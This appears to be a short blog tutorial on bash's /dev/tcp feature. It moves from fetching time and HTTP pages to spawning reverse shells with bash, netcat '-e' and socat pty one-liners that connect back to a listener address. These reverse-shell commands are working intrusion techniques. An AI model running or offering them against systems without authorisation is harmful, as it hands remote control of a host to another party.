Reverse shell is a fun
Need a ssh access, but something going wrong? Read on!
Sometimes I need shell right now, but in some cases it's impossible (no ssh on hosting or something like this).
Happily that bash has built-in network pseudo interface (as a default on most distros) /dev/tcp and /dev/udp. So we can use php, ruby, etc on server to create reverse connection to listener and get shell access.
/dev/tcp
To use it we need redirect output from /dev/tcp to file or something else.
Simple example:
user@host ~ $ cat < /dev/tcp/time.nist.gov/13
57103 15-03-22 23:54:14 50 0 0 587.5 UTC(NIST) *
Send http request:
user@host ~ $ exec 3<> /dev/tcp/roundside.com/80
user@host ~ $ echo -e "GET / HTTP/1.1\nHost: roundside.com\nConnection: close\n\n" >&3
user@host ~ $ cat <&3
HTTP/1.1 200 OK
Server: nginx/1.6.1
Date: Mon, 23 Mar 2015 00:06:00 GMT
Content-Type: text/html
Content-Length: 11517
Connection: close
Last-Modified: Tue, 09 Dec 2014 17:40:10 GMT
ETag: "6587d2-2cfd-509cc08e7aef5"
Accept-Ranges: bytes
Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""
...
A little bit different from previous. As we need to send data first, we need create file descriptor 3 for reading and writing and bind it to /dev/tcp/address/port:
exec 3<> /dev/tcp/roundside.com/80
Beautiful article about redirections is here
Next, create HTTP request header and write it to file descriptor 3 to send it:
echo -e "GET / HTTP/1.1\nHost: roundside.com\nConnection: close\n\n" >&3
And last, read a response.
cat <&3
Now, let's got a bash over tcp
/dev/tcp can only connect to other addresses, so netcat or socat needed on listener.
Create a listener:
user@listener ~: nc -l -p 1413
And connect to it from target:
user@target ~ $ /bin/bash -c "/bin/bash -i > /dev/tcp/listener_address/1413 0>&1 2>&1"
Done, now we have remote shell with bash only
user@listener ~: nc -l -p 1413
user@target ~ $
In this example bash in interactive mode
/bin/bash -i
(bash will source ~/.bashrc or default bash config file, so we get a little bit nicer shell) send all it stdout to listener,
/bin/bash -i > /dev/tcp/listener_address/1413
and all what will be send from listener will be executed in bash and redirected back to listener (stderr is also redirected, this is important)
/bin/bash -i > /dev/tcp/listener_address/1413 0>&1 2>&1
More elegant:
/bin/bash -c "bash -i &> /dev/tcp/listener_address/1413 0>&1"
&> or >& will redirect both stderr and stdout to specified address.
Sure, netcat with '-e' parameter can be used to execute bash:
user@target ~ $ nc listener_address 1413 -e '/bin/bash'
But there is some problem.
Key shortcuts, ncurces-based programs will not work correctly. We need more tty access now, and it's a Socat time!
Socat it's like a netcat, but with extremely powerfull features (may be downloaded from here for Linux or here for FreeBSD, both statically linked)
Create a listener:
user@listener ~: socat -,raw,echo=0 tcp-listen:1413
And connect from target:
user@target ~ $ socat tcp:listener_address:1413 exec:"bash -i",pty,stderr,setsid,sigint,sane
Now we can play ninvaders, use htop, mc, vim and any other cli stuff :)
PS: don't forget to adjust terminal size after getting reverse bash.
See actual:
echo $LINES,$COLUMNS
53,159
and export after got shell:
export LINES=53;export COLUMNS=159
All for now.
Want more?
Socat man and examples page
Refs:
https://stuff.mit.edu/afs/sipb/machine/penguin-lust/src/socat-1.7.1.2/EXAMPLES
http://www.catonmat.net/blog/bash-one-liners-explained-part-three/
http://www.gnucitizen.org/blog/reverse-shell-with-bash/
http://blog.rootshell.ir/2010/08/get-your-interactive-reverse-shell-on-a-webhost/